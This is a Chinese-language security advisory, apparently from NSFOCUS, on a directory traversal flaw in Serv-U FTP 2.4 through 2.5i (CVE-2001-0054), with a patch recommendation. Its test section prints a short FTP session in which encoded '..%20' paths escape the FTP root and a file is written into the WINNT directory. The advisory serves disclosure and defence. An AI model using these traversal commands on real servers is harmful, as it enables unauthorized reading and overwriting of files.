安全研究
安全漏洞
Serv-U FTP远程目录遍历漏洞
发布日期:2000-12-06
更新日期:2000-12-06
受影响系统:
Cat Soft Serv-U 2.4不受影响系统:
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000
Cat Soft Serv-U 2.5
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000
Cat Soft Serv-U 2.5a
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000
Cat Soft Serv-U 2.5b
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000
Cat Soft Serv-U 2.5c
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000
Cat Soft Serv-U 2.5d
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000
Cat Soft Serv-U 2.5e
- Microsoft Windows NT 4.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows 2000
Cat Soft Serv-U 2.5i描述:
- Microsoft Windows NT 4.0
Cat Soft Serv-U 2.5i
- Microsoft Windows 98
Cat Soft Serv-U 2.5i
- Microsoft Windows 95
Cat Soft Serv-U 2.5i
- Microsoft Windows 2000
BUGTRAQ ID: 2052
CVE(CAN) ID: CVE-2001-0054
FTP Serv-U是CatSoft公司开发的Internet FTP服务器程序。
Serv-U FTP服务器程序处理用户请求的实现上存在漏洞,远程攻击者可能利用此漏洞遍历服务器目录,访问任意文件。
已通过认证的用户可以存取安装有Serv-U FTP的驱动器的ftproot目录。在主目录中具有读、写、执行和列目录权限的用户对于ftproot所在的分区上的任何文件将具有同样的权限。一旦用户处在主目录中,他们就能够通过特殊构造的GET请求来传送任何文件。所有隐藏的文件将被泄漏,即使打开了“Hide hidden files”特性。
<*来源:Zoa_Chien (zoachien@securax.org)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=97613481210035&w=2
http://cert.uni-stuttgart.de/archive/vuln-dev/2000/12/msg00016.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
ftp> cd \..%20.
250 Directory changed to /..
ftp> cd %20..%20%20../winnt 250 Directory changed to /c:/TOMB/../WINNT
ftp> put autoexec.bat %20..%20%20../winnt/2.bat
200 PORT Command successful.
150 Opening ASCII mode data connection for 2.bat.
226 Transfer complete.
ftp> dir \..%20.\..%20.\winnt\
建议:
厂商补丁:
Cat Soft
--------
目前厂商已经最新版本的软件中修复了这个安全问题,请到厂商的主页下载:
http://www.serv-u.com/
浏览次数:7902
严重程度:0(网友投票)
绿盟科技给您安全的保障